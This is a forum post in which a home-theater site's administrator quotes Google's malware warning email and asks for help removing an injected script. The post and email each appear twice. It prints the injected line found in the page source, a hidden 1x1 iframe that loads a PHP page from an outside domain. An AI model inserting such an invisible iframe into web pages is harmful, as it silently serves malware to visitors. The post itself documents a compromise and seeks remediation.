Tweet
I got an email from Google today about a malware warning... here is the email:
I checked our Google Webmaster Tools site and sure enough it appears we have some pages that have issues.
The following pages:
There are a few other URLs, but mostly it appears to be an issue with the pages in the following forum on our site:
I see what Google is claiming to be the Malware when I view the page source:
<iframe name="41" width="1" height="1" scrolling="no" frameborder="no" marginwidth="0" marginheight="0" src="http://www.chekolkal.co.cc/felk.php"></iframe>
It is inserted just prior to: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
I have no idea how it gets there, but Google is issuing a warning to anyone who attempts to enter that page from a Google search. Some browsers will issue the warning if the security is set accordingly.
We do not have that iframe anywhere on our site... nor that link to chekolkal.co.cc/felk.php. I have no idea how it mysteriously appears on that page and only those pages.
I am assuming it is some form of a malicious attack on our site, so any suggestions on how to handle this AND how to get rid of that iframe and link would be greatly appreciated.
Regards,
Sonnie
Dear site owner or webmaster of hometheatershack.com,
We recently discovered that some of your pages can cause users to be infected with malicious software. We have begun showing a warning page to users who visit these pages by clicking a search result on Google.com.
Below are some example URLs on your site which can cause users to be infected (space inserted to prevent accidental clicking in case your mail client auto-links URLs):
http://www.hometheatershack .com/forums/official-shack-movie-reviews-blu-ray-dvd/16213-run-fatboy-run.html
http://www.hometheatershack .com/forums/official-shack-movie-reviews-blu-ray-dvd/25417-zombieland-dvd-review.html
http://www.hometheatershack .com/forums/official-shack-movie-reviews-blu-ray-dvd/29359-north-face-dvd-review.html
Here is a link to a sample warning page:
We strongly encourage you to investigate this immediately to protect your visitors. Although some sites intentionally distribute malicious software, in many cases the webmaster is unaware because:
1) the site was compromised
2) the site doesn't monitor for malicious user-contributed content
3) the site displays content from an ad network that has a malicious advertiser
If your site was compromised, it's important to not only remove the malicious (and usually hidden) content from your pages, but to also identify and fix the vulnerability. We suggest contacting your hosting provider if you are unsure of how to proceed. StopBadware also has a resource page for securing compromised sites:
Once you've secured your site, you can request that the warning be removed by visiting
and requesting a review. If your site is no longer harmful to users, we will remove the warning.
Sincerely,
Google Search Quality Team
Note: if you have an account in Google's Webmaster Tools, you can verify the authenticity of this message by logging into https://www.google.com/webmasters/tools/siteoverview and going to the Message Center, where a warning will appear shortly.
We recently discovered that some of your pages can cause users to be infected with malicious software. We have begun showing a warning page to users who visit these pages by clicking a search result on Google.com.
Below are some example URLs on your site which can cause users to be infected (space inserted to prevent accidental clicking in case your mail client auto-links URLs):
http://www.hometheatershack .com/forums/official-shack-movie-reviews-blu-ray-dvd/16213-run-fatboy-run.html
http://www.hometheatershack .com/forums/official-shack-movie-reviews-blu-ray-dvd/25417-zombieland-dvd-review.html
http://www.hometheatershack .com/forums/official-shack-movie-reviews-blu-ray-dvd/29359-north-face-dvd-review.html
Here is a link to a sample warning page:
We strongly encourage you to investigate this immediately to protect your visitors. Although some sites intentionally distribute malicious software, in many cases the webmaster is unaware because:
1) the site was compromised
2) the site doesn't monitor for malicious user-contributed content
3) the site displays content from an ad network that has a malicious advertiser
If your site was compromised, it's important to not only remove the malicious (and usually hidden) content from your pages, but to also identify and fix the vulnerability. We suggest contacting your hosting provider if you are unsure of how to proceed. StopBadware also has a resource page for securing compromised sites:
Once you've secured your site, you can request that the warning be removed by visiting
and requesting a review. If your site is no longer harmful to users, we will remove the warning.
Sincerely,
Google Search Quality Team
Note: if you have an account in Google's Webmaster Tools, you can verify the authenticity of this message by logging into https://www.google.com/webmasters/tools/siteoverview and going to the Message Center, where a warning will appear shortly.
I checked our Google Webmaster Tools site and sure enough it appears we have some pages that have issues.
The following pages:
There are a few other URLs, but mostly it appears to be an issue with the pages in the following forum on our site:
I see what Google is claiming to be the Malware when I view the page source:
<iframe name="41" width="1" height="1" scrolling="no" frameborder="no" marginwidth="0" marginheight="0" src="http://www.chekolkal.co.cc/felk.php"></iframe>
It is inserted just prior to: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
I have no idea how it gets there, but Google is issuing a warning to anyone who attempts to enter that page from a Google search. Some browsers will issue the warning if the security is set accordingly.
We do not have that iframe anywhere on our site... nor that link to chekolkal.co.cc/felk.php. I have no idea how it mysteriously appears on that page and only those pages.
I am assuming it is some form of a malicious attack on our site, so any suggestions on how to handle this AND how to get rid of that iframe and link would be greatly appreciated.
Regards,
Sonnie
Comment